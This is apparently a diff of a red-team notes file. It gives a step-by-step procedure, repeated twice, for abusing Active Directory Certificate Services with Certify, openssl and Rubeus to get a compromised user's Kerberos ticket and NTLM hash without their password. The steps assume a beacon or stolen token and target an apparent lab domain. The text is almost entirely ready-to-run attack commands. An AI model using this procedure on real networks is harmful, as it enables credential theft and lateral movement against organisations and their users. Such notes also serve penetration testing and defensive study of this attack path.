b4cktr4ck2 · February 22, 2023 00:28
diff --git a/Notes.txt b/Notes.txt
 If you're in a user's context where you don't have their password (I.e they ran a beacon/steal_token/other stuff) and ADCS is enabled,  you can use Certify + Rubeus to request a certificate and get their NTLM hash.

 1. Certify.exe request /ca:DC01.alexlab.local\alexlab-DC01-CA 
 2. Copypaste everything from BEGIN RSA PRIVATE KEY to END CERTIFICATE to a file ending in .pem onto a Linux box
 3. Run openssl pkcs12 -in filename.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
 4. Upload the PFX file into your beacon or base64 encode it with base64 cert.pfx -w 0
 5. Run Rubeus.exe asktgt /getcredentials /user:youruser /certificate:test.pfx /domain:alexlab.local /dc:dc01 /show
 ^Can substitute base64 string instead of uploading pfx.
	If you're in a user's context where you don't have their password (I.e they ran a beacon/steal_token/other stuff) and ADCS is enabled, you can use Certify + Rubeus to request a certificate and get their NTLM hash.

	1. Certify.exe request /ca:DC01.alexlab.local\alexlab-DC01-CA
	2. Copypaste everything from BEGIN RSA PRIVATE KEY to END CERTIFICATE to a file ending in .pem onto a Linux box
	3. Run openssl pkcs12 -in filename.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
	4. Upload the PFX file into your beacon or base64 encode it with base64 cert.pfx -w 0
	5. Run Rubeus.exe asktgt /getcredentials /user:youruser /certificate:test.pfx /domain:alexlab.local /dc:dc01 /show
	^Can substitute base64 string instead of uploading pfx.